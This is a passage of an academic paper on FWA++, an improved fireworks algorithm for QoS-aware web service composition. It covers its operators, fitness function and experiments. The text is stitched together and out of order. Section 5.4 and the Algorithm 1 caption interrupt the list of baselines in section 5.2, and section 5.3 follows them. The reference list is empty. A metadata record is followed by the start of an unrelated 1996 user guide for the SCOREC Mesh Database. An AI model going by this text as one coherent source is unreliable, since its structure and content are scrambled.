In this mathematical modeling, response time and price are negative attributes; the smaller the better. Reputation and availability are positive attributes; the larger the better. Therefore, in order to unify metrics and calculations, it is necessary to normalize the QoS values. The normalization methods of QoS value are defined as follows:
\[
q_i = \begin{cases}
\frac{q_i - q_i^{\min}}{q_i^{\max} - q_i^{\min}}, & q_i^{\min} \neq q_i^{\max}, \\
1, & q_i^{\min} = q_i^{\max},
\end{cases} \quad (1)
\]
\[
q_i = \begin{cases}
\frac{q_i^{\max} - q_i}{q_i^{\max} - q_i^{\min}}, & q_i^{\min} \neq q_i^{\max}, \\
1, & q_i^{\min} = q_i^{\max},
\end{cases} \quad (2)
\]
\( q_i^{\max} \) and \( q_i^{\min} \) are the maximum value and minimum value of the \( i \)th QoS attribute of composite services, respectively; Equation (1) is used to normalize the negative attributes, such as response time and price; Equation (2) is used to normalize the positive attributes, such as reputation and availability.
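As an illustration (not code from the paper), the two normalization branches of Equations (1) and (2) can be sketched as a single Python helper; the function name and signature are our own:

```python
def normalize(q, q_min, q_max, negative):
    """Map a raw QoS value into [0, 1] so that smaller is always better.

    negative=True  -> Eq. (1): response time, price
    negative=False -> Eq. (2): reputation, availability
    """
    if q_min == q_max:          # degenerate case: all candidates identical
        return 1.0
    if negative:
        return (q - q_min) / (q_max - q_min)
    return (q_max - q) / (q_max - q_min)
```

After this transformation, every attribute contributes to the minimization objective in the same direction.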
We model the service composition problem as a minimization problem, and the optimization model is formulated as follows:
\[
\text{minimize} \quad \sum_{k=1}^{r} \left( q_k^{\text{agg}} \times w_k \right) + \sum_{j=1}^{l} \left( q_j^{\text{agg}} \times w_j \right). \quad (3)
\]
In a composite service, \( r \) and \( l \) are the numbers of negative and positive QoS attributes of each service, respectively. \( w_k \) and \( w_j \) represent the weights of the \( k \)th negative and \( j \)th positive attributes, respectively. \( q_k^{\text{agg}} \) is the aggregated value of the \( k \)th negative attribute over all component services, and \( q_j^{\text{agg}} \) is the aggregated value of the \( j \)th positive attribute over all component services.
### 4. Proposed Approach
In this section, we will introduce the overall framework of the approach and explain the details of our approach.
4.1. The Whole Framework. The framework of our approach is shown in Figure 2, which consists of two parts: (1) Data preparation: first, the document model is used to process WSDL documents to generate the corresponding embeddings. Then, we use the k-means algorithm to cluster the embeddings. Finally, they are divided into four clusters as the input data of the following algorithm. (2) Primary algorithm processing: first, FWA++ randomly initializes the fireworks population \( N \) and evaluates their fitness values to find the current best solution. Second, FWA++ enters the iterations: (a) Calculate the number of explosion sparks and the explosion amplitude of each firework according to its fitness value, and then generate explosion sparks. (b) Perform Gaussian mutation to generate Gaussian sparks, and map any out-of-bounds sparks back into the feasible space. (c) According to the selection strategy, keep the current optimal solution and randomly select \( N-1 \) individuals from the current sparks and fireworks for the next generation. Finally, when the termination condition is met, the algorithm outputs the optimal solution.
4.2. Data Preparation. In this part, we will describe the process of data preprocessing in detail.
4.2.1. WSDL to Embedding. The significant text information of a service, including messages, documentation, service name, and operations, is recorded in its WSDL (Web Service Description Language) document. To obtain service function information, we extract the messages, documentation, service name, and operations from the WSDL document and then digitize the extracted text. Here, the sentence-transformers framework is used to convert the text information into an embedding. It provides an easy way to compute dense vector representations of sentences and offers many models for text digitization. We choose the paraphrase-xlm-r-multilingual-v1 model to obtain the embeddings. The model is based on transformer networks such as BERT/RoBERTa/XLM-RoBERTa and achieves strong performance on this task; similar text information is embedded close together in the vector space. After each WSDL document is processed by the paraphrase-xlm-r-multilingual-v1 model, it is represented by an embedding. Finally, each service corresponds to one embedding.
4.2.2. Classify Web Services. The k-means algorithm is an unsupervised clustering algorithm that is relatively easy to implement, and it is widely used because of its good performance. Its idea is simple: a sample set is divided into several clusters according to the distances between samples, so that points within a cluster are as close as possible and the distance between clusters is as large as possible. In our approach, we use k-means to cluster the embeddings generated by the paraphrase-xlm-r-multilingual-v1 model, where each embedding represents a concrete service. In this way, services are classified according to their functions.
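The assign/update loop of k-means can be sketched with a minimal pure-Python implementation; in practice a library implementation would be used, and this toy version (our own names and parameters) is only illustrative:

```python
import math
import random

def kmeans(points, k, iters=100, seed=0):
    """Minimal k-means: returns a cluster label for each embedding."""
    rng = random.Random(seed)
    centers = [list(c) for c in rng.sample(points, k)]
    labels = [0] * len(points)
    for _ in range(iters):
        # assignment step: nearest center by Euclidean distance
        labels = [min(range(k), key=lambda c: math.dist(p, centers[c]))
                  for p in points]
        # update step: move each center to the mean of its cluster
        for c in range(k):
            members = [p for p, lab in zip(points, labels) if lab == c]
            if members:
                centers[c] = [sum(dim) / len(members) for dim in zip(*members)]
    return labels
```

Services whose embeddings land in the same cluster are treated as candidates for the same abstract service.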
4.2.3. Merge Data. The QoS information corresponding to each service is merged according to the clustering result of the k-means algorithm. After the merger, each abstract service contains several concrete services, and the QoS information of each concrete service consists of four attribute values: cost, response time, reputation, and availability.
4.3. Fireworks Algorithm. The fireworks algorithm (FWA) is inspired by the fireworks explosion and presented by Tan and Zhu [7]. The idea of the algorithm is simple, but the specific implementation is complicated. It is mainly composed of four parts: explosion operator, mutation operator, mapping rule, and selection strategy. In the explosion phase, explosion sparks will be generated. And the basic principle is that if a firework’s fitness value is better than that of other fireworks, it will have a smaller explosion range and generate more explosion sparks. The purpose is to speed up the local search ability near the current optimal solution. On the contrary, if a firework’s fitness value is relatively poor, it has an extensive explosion range and generates a small number of explosion sparks. The primary purpose is to enhance the diversity of the population. In the mutation phase, Gaussian sparks will be generated and increase the diversity of the spark population. Meanwhile, unsatisfied Gaussian sparks...
are mapped to the feasible space by the mapping rule. In the selection phase, the algorithm refers to the quality of the sparks’ locations and randomly keeps a specified number of sparks. The framework of the fireworks algorithm is shown in Figure 3. For each generation of explosions, N locations are selected and N fireworks are set off. We then obtain the locations of the sparks and evaluate their quality. The algorithm stops once the optimal solution is found; otherwise, it selects N locations from the current fireworks and sparks as the next generation of explosions.
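The explode/mutate/select loop described above can be sketched as a toy Python routine; all names and constants below are ours, and the amplitude and spark-count formulas of Eqs. (5)–(7) are replaced by fixed values for brevity:

```python
import random

def fwa_sketch(fitness, dim, bounds, n_fireworks=5, generations=50, rng=random):
    """Toy skeleton of the fireworks loop in Figure 3: explode each firework,
    add one Gaussian mutation spark, then keep the elite plus random picks."""
    lb, ub = bounds

    def clamp(x):
        return min(max(x, lb), ub)

    pop = [[rng.uniform(lb, ub) for _ in range(dim)] for _ in range(n_fireworks)]
    best = min(pop, key=fitness)
    for _ in range(generations):
        sparks = []
        for fw in pop:
            for _ in range(5):  # fixed spark count per firework (toy value)
                sparks.append([clamp(x + rng.uniform(-1.0, 1.0)) for x in fw])
        mutant = rng.choice(pop)  # one Gaussian mutation spark
        sparks.append([clamp(x * rng.gauss(1.0, 1.0)) for x in mutant])
        candidates = pop + sparks
        gen_best = min(candidates, key=fitness)
        if fitness(gen_best) < fitness(best):
            best = gen_best
        # elite + uniform random selection, as in FWA++
        pop = [best] + rng.sample(candidates, n_fireworks - 1)
    return best
```

On a smooth toy objective this skeleton converges quickly because the elite is never discarded and every generation searches a neighborhood around it.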
4.4. Feasible Solution Encoding. Before using the algorithm to implement service composition, each concrete service must be coded. The integer coding method is adopted: the concrete services in each abstract service are coded starting from 1, so if there are N services in an abstract service, then 1, 2, 3, ⋯, N are the codes of its services, and the remaining abstract services are coded in the same way. Figure 4 shows a feasible solution [1, 5, 3, 2], which means that service 1 is selected from the first abstract service, service 5 is selected from the second abstract service, service 3 is selected from the third abstract service, and service 2 is selected from the fourth abstract service.
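The integer encoding can be illustrated as follows; the helper names and the `qos_table` layout are our assumptions, not the paper's API:

```python
import random

def random_solution(n_abstract, n_concrete, rng=random):
    """Encode a composite service: position i holds the (1-based) code of the
    concrete service chosen for the i-th abstract service."""
    return [rng.randint(1, n_concrete) for _ in range(n_abstract)]

def decode(solution, qos_table):
    """Look up the QoS record of each selected concrete service.
    qos_table[i][c-1] is the record of concrete service c of abstract service i."""
    return [qos_table[i][c - 1] for i, c in enumerate(solution)]
```

Each position of the list is one dimension of a firework, so the operators below manipulate these integer vectors.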
4.5. Operator Analysis. Suppose the problem to be optimized is
$$\text{Min } f(x) \in R, \quad x \in \Omega,$$
where \(\Omega\) is the feasible region of the solution. Below, we will introduce each part in detail.
4.5.1. Explosion Operator. The explosion operation is essential for the fireworks to generate sparks. Generally, fireworks with better fitness values can generate more sparks in a smaller area; it enhances the algorithm’s capability of local search. Conversely, fireworks with poor fitness values can only generate fewer sparks in a larger range; it is aimed at increasing the diversity of sparks and improving the algorithm’s global search capability.
In the FWA, the explosion amplitude of each firework and the number of explosion sparks are calculated based on its fitness value relative to other fireworks. For a firework \(x_i\), the formulas for the explosion amplitude \(A_i\) and the number of explosion sparks \(S_i\) are defined as follows:
$$A_i = \hat{A} \times \frac{f(x_i) - y_{\min} + \varepsilon}{\sum_{i=1}^{N} (f(x_i) - y_{\min}) + \varepsilon}, \quad (5)$$
$$S_i = M \times \frac{y_{\max} - f(x_i) + \varepsilon}{\sum_{i=1}^{N} (y_{\max} - f(x_i)) + \varepsilon}, \quad (6)$$
where \(y_{\min} = \min (f(x_i)) (i = 1, 2, \cdots, N)\) is the minimum fitness value in the current firework population and \(y_{\max} = \max (f(x_i)) (i = 1, 2, \cdots, N)\) is the maximum fitness value in the current firework population. \(\hat{A}\) is a constant used to adjust the amplitude of the explosion, \(M\) is also a constant used to adjust the number of explosion sparks, and \(\varepsilon\) is a minimal positive constant used to avoid division by zero. In order to dynamically balance the search ability of FWA++ and its ability to jump out of local optima, FWA++ randomizes the total number of sparks \(M\) and the maximum explosion amplitude \(\hat{A}\) in each generation.
To prevent fireworks with good fitness values from generating too many explosion sparks, while ensuring that fireworks with poor fitness values still generate a few, the number of sparks $S_i$ is bounded by the following formula:
$$S_i = \begin{cases} \text{round}(a \cdot M), & S_i < aM, \\ \text{round}(b \cdot M), & S_i > bM, a < b < 1, \\ \text{round}(S_i), & \text{otherwise}, \end{cases}$$
(7)
where $a$ and $b$ are constants bounding the number of explosion sparks ($0 < a < b < 1$) and round($\cdot$) is a rounding function based on the rounding principle.
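Equations (5)–(7) together can be sketched as one Python routine; the function name is ours, and the parameter defaults are illustrative values mirroring the experimental settings in Section 5.3:

```python
EPS = 1e-12  # the small positive constant epsilon of Eqs. (5)-(6)

def explosion_params(fitness_values, A_hat=40.0, M=50, a=0.04, b=0.8):
    """Per-firework explosion amplitude A_i (Eq. 5) and bounded spark count
    S_i (Eqs. 6-7). Smaller fitness = better (minimization problem)."""
    y_min, y_max = min(fitness_values), max(fitness_values)
    denom_a = sum(f - y_min for f in fitness_values) + EPS
    denom_s = sum(y_max - f for f in fitness_values) + EPS
    amps, counts = [], []
    for f in fitness_values:
        amps.append(A_hat * (f - y_min + EPS) / denom_a)
        s = M * (y_max - f + EPS) / denom_s
        # Eq. (7): clamp the spark count into [round(a*M), round(b*M)]
        if s < a * M:
            s = round(a * M)
        elif s > b * M:
            s = round(b * M)
        else:
            s = round(s)
        counts.append(int(s))
    return amps, counts
```

Note how the best firework (smallest fitness) gets the smallest amplitude but the most sparks, and vice versa.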
When a firework explodes, the spark can be displaced in $z$ randomly chosen dimensions. The FWA obtains the number of affected dimensions by the formula
$$z = \text{round}(d \cdot \text{rand}(0, 1)), \quad (8)$$
where $d$ is the dimension of a firework and rand$(0, 1)$ represents a random number function conforming to a uniform distribution on the interval $[0, 1]$.
Assuming that the $i$th firework is $x_i = (x_{i1}, x_{i2}, \cdots, x_{id})$, the formula for generating an explosion spark in each selected dimension $k$ is
$$h = A_i \cdot \text{rand}(-1, 1),$$
$$\tilde{x}_{ik} = x_{ik} + h, \quad (9)$$
where $h$ is the displacement and $\tilde{x}_{ik}$ is the spark's coordinate in dimension $k$.
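The spark-generation step of Equations (8) and (9) might look like this in Python (an illustrative sketch; the helper name is our own):

```python
import random

def explosion_spark(firework, amplitude, rng=random):
    """Displace z randomly chosen dimensions of a firework by the same
    random offset h drawn from [-A_i, A_i] (Eqs. 8-9)."""
    d = len(firework)
    z = round(d * rng.random())                 # Eq. (8): number of affected dims
    dims = rng.sample(range(d), z)
    h = amplitude * rng.uniform(-1.0, 1.0)      # Eq. (9): shared offset
    spark = list(firework)
    for k in dims:
        spark[k] += h
    return spark
```

For the integer-encoded solutions of Section 4.4, the displaced coordinates would additionally be rounded back to valid service codes.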
4.5.2. Mutation Operator. Many sparks can be generated through the explosion operation, but these sparks are mainly around the original fireworks and have similar properties to the original firework population. In order to keep the diversity of the sparks, FWA introduces a mutation operator to generate Gaussian sparks. The process is as follows: FWA randomly selects a firework $x_i$ from the firework population and then randomly selects a certain number of its dimensions on which to perform the Gaussian mutation operation. Performing the Gaussian mutation operation on a selected dimension $k$ of firework $x_i$ gives
$$\tilde{x}_{ik} = x_{ik} \times e, \quad (10)$$
where $e \sim N(1, 1)$ and $N(1, 1)$ represents the Gaussian distribution with a mean of 1 and a variance of 1.
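A sketch of the Gaussian mutation of Equation (10), with our own helper name; forcing at least one mutated dimension is our simplification:

```python
import random

def gaussian_spark(firework, rng=random):
    """Multiply randomly chosen dimensions by e ~ N(1, 1) (Eq. 10)."""
    d = len(firework)
    z = max(1, round(d * rng.random()))   # at least one mutated dimension
    dims = rng.sample(range(d), z)
    e = rng.gauss(1.0, 1.0)               # shared multiplier for all chosen dims
    spark = list(firework)
    for k in dims:
        spark[k] *= e
    return spark
```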
4.5.3. Mapping Rules. The explosion sparks and Gaussian sparks may exceed the boundary of the feasible region Ω. When a spark $x_i$ exceeds the boundary in dimension $k$, it is mapped to a new location through the mapping rule of formula (11):
\[ \tilde{x}_{ik} = x_{\text{LB},k} + \left| \tilde{x}_{ik} \right| \% (x_{\text{UB},k} - x_{\text{LB},k}), \]
(11)
where \( x_{\text{LB},k} \) and \( x_{\text{UB},k} \) are the lower and upper bounds of the solution space in dimension k, respectively, and \% denotes the modulo operation.
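The mapping rule of Equation (11) can be sketched as follows (illustrative helper, our own name):

```python
def map_back(value, lb, ub):
    """Eq. (11): wrap an out-of-bounds coordinate back into [lb, ub)."""
    if lb <= value <= ub:
        return value
    return lb + abs(value) % (ub - lb)
```

Wrapping (rather than clipping to the boundary) keeps out-of-bounds sparks spread over the feasible interval instead of piling up at its edges.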
4.5.4. Selection Strategy. In FWA, in order to carry the excellent individuals of the firework population into the next generation, N individuals need to be selected from the candidate set composed of the explosion sparks, Gaussian sparks, and fireworks of the current generation. Suppose that the candidate set is \( K \) and the population size is \( N \). The individual with the smallest fitness value in the candidate set is deterministically carried into the next generation as a firework (elite strategy), and the remaining \( N-1 \) fireworks are selected from the candidate set. For a candidate \( x_i \), the selection probability is computed as follows:
\[ p(x_i) = \frac{R(x_i)}{\sum_{j \in K} R(x_j)}, \]
\[ R(x_i) = \sum_{j \in K} d(x_i, x_j) = \sum_{j \in K} \|x_i - x_j\|, \]
(12)
where \( R(x_i) \) is the sum of the distances between the current individual \( x_i \) and the other individuals in the candidate set, and \( p(x_i) \) is the probability of the individual being selected. If an individual is far away from the others in the candidate set, its probability of being selected is high. However, this selection strategy is time-consuming, so FWA++ instead keeps \( N-1 \) individuals for the next generation by uniform random selection.
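The distance-based probabilities of Equation (12) can be sketched as follows (Euclidean distance, our own helper name); FWA++ itself skips this O(|K|²) computation and uses uniform random selection:

```python
import math

def selection_probs(candidates):
    """Distance-based selection probabilities (Eq. 12): a candidate far from
    the others in the set has a higher chance of being kept."""
    r = [sum(math.dist(x, y) for y in candidates) for x in candidates]
    total = sum(r)
    return [ri / total for ri in r]
```

The pairwise-distance sum is exactly what makes this strategy expensive for large spark sets, which motivates the random selection used by FWA++.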
4.6. Fitness Function. The utility function is used to evaluate the pros and cons of the composite service. In order to calculate the fitness value of the current composite service, the utility function is constructed as follows:
\[ \text{fitness} = \sum_{i=1}^{4} \left( q_i^{\text{agg}} \times w_i \right) + D(p), \]
\[ D(p) = \frac{t_c}{t_m} \times \sum_{i=1}^{4} \left[ w_i \times \left( \frac{\Delta q_i}{q_{i_{\text{con}}}} \right)^2 \right], \]
(13)
where \( D(p) \) is the penalty coefficient, \( t_c \) is the current generation, \( t_m \) is the maximum generation, \( w_i \) is the weight of the ith QoS attribute of the composite service, \( \Delta q_i \) is related to the positive and negative of QoS attributes, and \( q_{i_{\text{con}}} \) is the user’s constraint on the ith QoS attribute, which is offered by users. The formula for calculating \( \Delta q_i \) is as follows.
If the QoS attributes are positive attributes (such as reputation and availability), then
\[ \Delta q_i^+ = \begin{cases} q_{i_{\text{con}}} - q_i, & q_i < q_{i_{\text{con}}}, \\ 0, & q_i \geq q_{i_{\text{con}}}, \end{cases} \]
(14)
If the QoS attributes are negative attributes (such as price and response time), then
\[ \Delta q_i^- = \begin{cases} q_i - q_{i_{\text{con}}}, & q_i > q_{i_{\text{con}}}, \\ 0, & q_i \leq q_{i_{\text{con}}}. \end{cases} \]
(15)
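The constraint-violation terms of Equations (14)–(15) and the time-scaled penalty of Equation (13) can be sketched as two small helpers (our own names; weights and constraints are caller-supplied):

```python
def delta_q(q, q_con, positive):
    """Constraint violation of one QoS attribute (Eqs. 14-15): zero when the
    user constraint q_con is satisfied, otherwise the amount of violation."""
    if positive:                              # e.g. reputation, availability
        return q_con - q if q < q_con else 0.0
    return q - q_con if q > q_con else 0.0    # e.g. price, response time

def penalty(t_c, t_m, weights, deltas, constraints):
    """Time-scaled penalty D(p) (Eq. 13): grows with the generation index t_c,
    so constraint violations are punished more heavily late in the run."""
    return (t_c / t_m) * sum(
        w * (dq / qc) ** 2 for w, dq, qc in zip(weights, deltas, constraints))
```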
4.7. Pseudocode of FWA++ and Computational Complexity. The pseudocode of FWA++ is reported in Algorithm 1. In FWA++, each generation consists of an initialization operation, an explosion operation, a mutation operation, and a selection operation. The initialization operation includes initializing the population and calculating the fitness values, and the computational complexity is \( O(N) \) and \( O(N) \), respectively, where \( N \) is the population size. The explosion operation includes calculating the explosion amplitudes, calculating the number of explosion sparks, generating the explosion sparks, and calculating their fitness values, and the computational complexity is \( O(N) \), \( O(N) \), \( O(S_i) \), and \( O(S_i) \), respectively, where \( S_i \) is the number of explosion sparks. The mutation operation includes generating Gaussian sparks and calculating their fitness values, and the computational complexity is \( O(M_g) \) and \( O(M_g) \), respectively. The selection operation chooses \( N \) sparks from the fireworks, explosion sparks, and Gaussian sparks for the next generation, and the computational complexity is \( O(N + M_g + S_i) \), where \( M_g \) is the number of Gaussian sparks in each generation. Therefore, with the maximum number of generations \( T \), the computational complexity of FWA++ is \( O(T \times (5N + 3M_g + 3S_i)) \).
### 5. Experiments and Evaluation
All algorithms were developed in Python, and all experiments were run on a PC equipped with AMD Ryzen 7 5800H CPU, 16 GB memory, and Windows 10 OS.
5.1. Data Set. In order to verify the effectiveness of our approach, we use QWS2.0 real-world data provided by [36]. The data set includes 9 QoS attributes of 2500 real web services. Since the data set does not include the price attribute of services, the attribute value of the service price is generated in a certain range (0.01-1.00) through a random algorithm.
5.2. Baseline Approaches. In this paper, we select the following well-known metaheuristic optimization algorithms to compare with our algorithm:
(1) Fireworks Algorithm (FWA) [36]. FWA is a global optimization algorithm inspired by exploding fireworks. It has advantages in convergence speed and global solution accuracy.
5.4. Performance Comparison. In the experiments, the mean value of 20 independent runs of each algorithm was used to make a reasonable evaluation. We fix the number of abstract services to 4, each with the same number of candidate services, and vary the total number of candidate services from 100 to 500. We can see that as the number of iterations increases, the fitness value of FWA++ decreases rapidly. The fitness value of FWA++ is superior to those of FWA, mABC, and CPSO by iteration 100. The fitness hardly changes between iterations 250 and 500, which means that FWA++ has converged. These results show that FWA++ outperforms the other algorithms.
Algorithm 1: The pseudocode of FWA++.
(2) Particle Swarm Optimization with Corrective Procedure (CPSO) [38]. In this approach, the corrective procedure was introduced to upgrade particles effectively. The results show that it greatly alleviates the problems of premature convergence and local optima.
(3) Modified Artificial Bee Colony (mABC) Algorithm [32]. In this algorithm, a chaotic-based opposition learning method is used to initialize the population, and differential evolution (DE) is used to enhance exploitation. mABC has robust scalability and high convergence speed.
5.3. Parameter Settings. The following parameter settings were used in our experiments: For the fitness function, the user preferences \( q_{com}^c, q_{com}^m, q_{com}^f \), and \( q_{com}^s \) for the four QoS attributes are set to 0.50, 0.30, 0.80, and 0.80, respectively. The preference values are provided by the user; if the user does not provide them, the default values are used. The weights of the four attributes are set to 0.2, 0.2, 0.3, and 0.3, respectively. For FWA++, the population size \( N \) is set to 5, \( M \) is set to a random number between 50 and 80 in each generation, \( \bar{A} = 40, a = 0.04, b = 0.8, M_g = 11 \), and the maximum number of generations (iterations) is set to 500. For FWA, the population size \( N \) is set to 5, and \( M = 5, \bar{A} = 40, a = 0.04, b = 0.8, M_g = 5 \), and the maximum number of generations (iterations) is set to 500. For CPSO, the population size \( N \) is set to 30 and the maximum number of iterations is set to 500. For mABC, the population size \( N \) is set to 30, the maximum number of iterations is set to 500, \( \mu = 4 \), and limit \( = D \times N / 2 \) (where \( D \) is the dimension size).
From Figure 6, we can observe the optimization results as the total number of candidate services varies from 100 to 500. The fitness values of FWA++ are better than those of the other algorithms in all cases. Meanwhile, all algorithms maintain a relatively stable fitness value as the number of candidate services increases, which means that the number of candidate services has little influence on algorithm performance.
From Figure 7, the optimization results can be seen clearly where the total number of candidate services varies from 100 to 500 and the total number of services is fixed to 300. With the increasing number of candidate services, the computation time is maintained at a certain level. Moreover, the computation time of FWA++ is the lowest among the algorithms in all cases. In addition, FWA needs much more computation time because of its distance-based selection strategy, which makes it not comparable with the other algorithms.
5.5. Sensitivity Analysis of Parameters
5.5.1. Impact of $N$. The variable $N$ represents the population size, and the population size is the total number of individuals in any generation. Usually, this parameter is artificially set. The population size has an essential influence on the final solution. In order to obtain a more appropriate population...
size, we set \( N \) between 5 and 50. By setting different population sizes, we obtain different fitness values; the results are shown in Figure 8. The fitness values differ considerably under different population sizes, which shows that the population size greatly influences the experimental results. We can also observe that when the population size is 5, a relatively small fitness value is obtained. So, we set the population size of FWA++ in our experiments to 5.
5.5.2. Impact of \( M_g \). \( M_g \) represents the number of Gaussian sparks. If \( M_g \) is too small, FWA++ cannot maintain the diversity of the population; it may fall into a local optimum and have difficulty obtaining the optimal solution. Figure 9 shows the optimization results under different values of \( M_g \); we can see that when \( M_g \) is 11, the obtained fitness value is the smallest, so we set \( M_g \) to 11 in our experiments.
5.6. Statistical Analysis. We perform the Friedman test [38–40] and the Wilcoxon signed-rank test [41] for statistical analysis to show that our proposed approach is statistically significant. Table 1 shows the statistical analysis of FWA++ compared with FWA, mABC, and CPSO, where “NAC” represents the number of abstract services, “MAC” represents the total number of concrete services, a \( p \) value < 0.05 indicates that two approaches have distinct differences, and “+” indicates that our approach is preferred to the other one. It can be seen that the \( p \) values of FWA++ are particularly low in all of the cases (NAC = 4, MAC varies from 100 to 500), which demonstrates that FWA++ has distinct differences from FWA, mABC, and CPSO. Furthermore, we can observe from the “performance” index that the FWA++ algorithm has the best performance among these algorithms. Therefore, FWA++ is significantly effective.
### 6. Conclusions
Although the number of services keeps increasing, it is difficult for a single service to complete complex tasks. Therefore, we need to combine multiple services to complete them, and the efficiency of service composition has become a problem to be solved.
This paper proposes a service composition approach based on the improved fireworks algorithm (FWA++). We adopt a random selection strategy, which greatly reduces the running time of the algorithm. We balance the search ability and the ability to jump out of the local optimal solution by dynamically adjusting the total number of sparks and maximum amplitude of sparks for each generation. In this way, the optimization results are more accurate. Compared
with the existing algorithms, our algorithm has better performance.
In the future, we hope to integrate more multidimensional QoS attributes into the model, including waiting time, throughput, and reliability. In addition, we hope that web service composition will be more user-friendly, which can be combined with service recommendations. It can analyze user preferences through historical data and then recommend more personalized composite services to users.
Data Availability
The data used to support the findings of this study are available from the corresponding authors upon request.
Conflicts of Interest
The authors declare no potential conflicts of interest with respect to the research, authorship, and/or publication of this paper.
Acknowledgments
This work was supported in part by the Natural Science Foundation of Zhejiang Province under Grant LY22F020007 and Grant LY21F020002, in part by the Key Research and Development Program Project of Zhejiang Province under Grant 2019C01004 and Grant 2019C03123, and in part by the Commonwealth Project of Science and Technology Department of Zhejiang Province under Grant LGF19F020007.
References
|
{"Source-Url": "https://downloads.hindawi.com/journals/misy/2022/4277909.pdf", "len_cl100k_base": 8981, "olmocr-version": "0.1.50", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 48292, "total-output-tokens": 12476, "length": "2e13", "weborganizer": {"__label__adult": 0.0003893375396728515, "__label__art_design": 0.0004763603210449219, "__label__crime_law": 0.0004754066467285156, "__label__education_jobs": 0.00127410888671875, "__label__entertainment": 0.00012058019638061523, "__label__fashion_beauty": 0.0002143383026123047, "__label__finance_business": 0.0007061958312988281, "__label__food_dining": 0.0004458427429199219, "__label__games": 0.00061798095703125, "__label__hardware": 0.0009937286376953125, "__label__health": 0.0009446144104003906, "__label__history": 0.0004055500030517578, "__label__home_hobbies": 0.0001132488250732422, "__label__industrial": 0.00054168701171875, "__label__literature": 0.0004897117614746094, "__label__politics": 0.0004458427429199219, "__label__religion": 0.0005583763122558594, "__label__science_tech": 0.152587890625, "__label__social_life": 0.0001456737518310547, "__label__software": 0.0118865966796875, "__label__software_dev": 0.8251953125, "__label__sports_fitness": 0.0002815723419189453, "__label__transportation": 0.0005831718444824219, "__label__travel": 0.00023651123046875}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 47278, 0.04564]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 47278, 0.35004]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 47278, 0.87773]], "google_gemma-3-12b-it_contains_pii": [[0, 3806, false], [3806, 10094, null], [10094, 16101, null], [16101, 20634, null], [20634, 23866, null], [23866, 25866, null], [25866, 31337, null], [31337, 34412, null], [34412, 34950, null], [34950, 35692, null], [35692, 38398, null], [38398, 44268, null], [44268, 47278, 
null]], "google_gemma-3-12b-it_is_public_document": [[0, 3806, true], [3806, 10094, null], [10094, 16101, null], [16101, 20634, null], [20634, 23866, null], [23866, 25866, null], [25866, 31337, null], [31337, 34412, null], [34412, 34950, null], [34950, 35692, null], [35692, 38398, null], [38398, 44268, null], [44268, 47278, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 47278, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 47278, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 47278, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 47278, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 47278, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 47278, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 47278, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 47278, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 47278, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 47278, null]], "pdf_page_numbers": [[0, 3806, 1], [3806, 10094, 2], [10094, 16101, 3], [16101, 20634, 4], [20634, 23866, 5], [23866, 25866, 6], [25866, 31337, 7], [31337, 34412, 8], [34412, 34950, 9], [34950, 35692, 10], [35692, 38398, 11], [38398, 44268, 12], [44268, 47278, 13]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 47278, 0.0]]}
|
olmocr_science_pdfs
|
2024-12-03
|
2024-12-03
|
56edbe98a89f399dce8fc1d07a91d5dd2242f44d
|
SCOREC Mesh Database
Version 2.4
Users Guide
Mark W. Beall
Scientific Computation Research Center
Rensselaer Polytechnic Institute
Troy, NY 12180
August 2, 1996
1.0 Introduction
This section is a general introduction to the SCOREC Mesh Database. Some of the basic concepts behind the mesh database are described. In addition some general instructions on linking to and using the mesh database are given as well as some debugging tips.
1.1 Current Status
This document describes version 2.4 of the SCOREC Mesh Database. The software described here has been used in several major programs and many minor ones without problems. At this point most of the bugs should have been worked out (although, certainly, having said that, new ones will appear). This software is written in ANSI C and thus should be portable to any system that has an appropriate compiler; it has been used with the following compilers and operating systems:
- SunOS 4.1.3 (acc and gcc)
- SunOS 5.4, 5.5 (cc)
- IRIX 5.3, 5.4 (cc)
- AIX 3.2, 4.1 (cc and gcc)
1.2 Overview
The SCOREC Mesh Database is designed to allow easy access to and modification of data that describes the discretization of a geometric domain. Specifically, the database has been designed for use in the context of finite element meshes, but it certainly may have applicability outside that one area.
The mesh database is implemented using an object-oriented methodology. There is a set of objects defined that represent the entities in the database. Each of the objects has a set of operators that act to retrieve/store/modify data in the database. There is no access to the actual internal data structures in the database. The objects that exist in the mesh database are as follows:
- pMesh - a model in which the entities in are classified with respect to a geometric model.
- pGModel - a topological representation of a geometric model.
- pRegion - a three dimensional entity bounded by faces.
- pFace - a two dimensional entity bounded by edges.
- pEdge - a one dimensional entity bounded by vertices.
- pVertex - a zero dimensional entity.
- pPoint - a position in x, y, z space.
- pNode - something that degrees of freedom are associated with.
- pPList - variable length list
There are two other objects that are base classes of the above objects, when an operator takes one of these objects it may take an object of any of its derived types, when an operator returns one of these objects it may be an object of any of its derived types:
- pModel - either a pMesh or a pGModel
- pEntity - a pRegion, pFace, pEdge, pVertex or pNode.
Each operator takes as its first argument the object to be operated on.
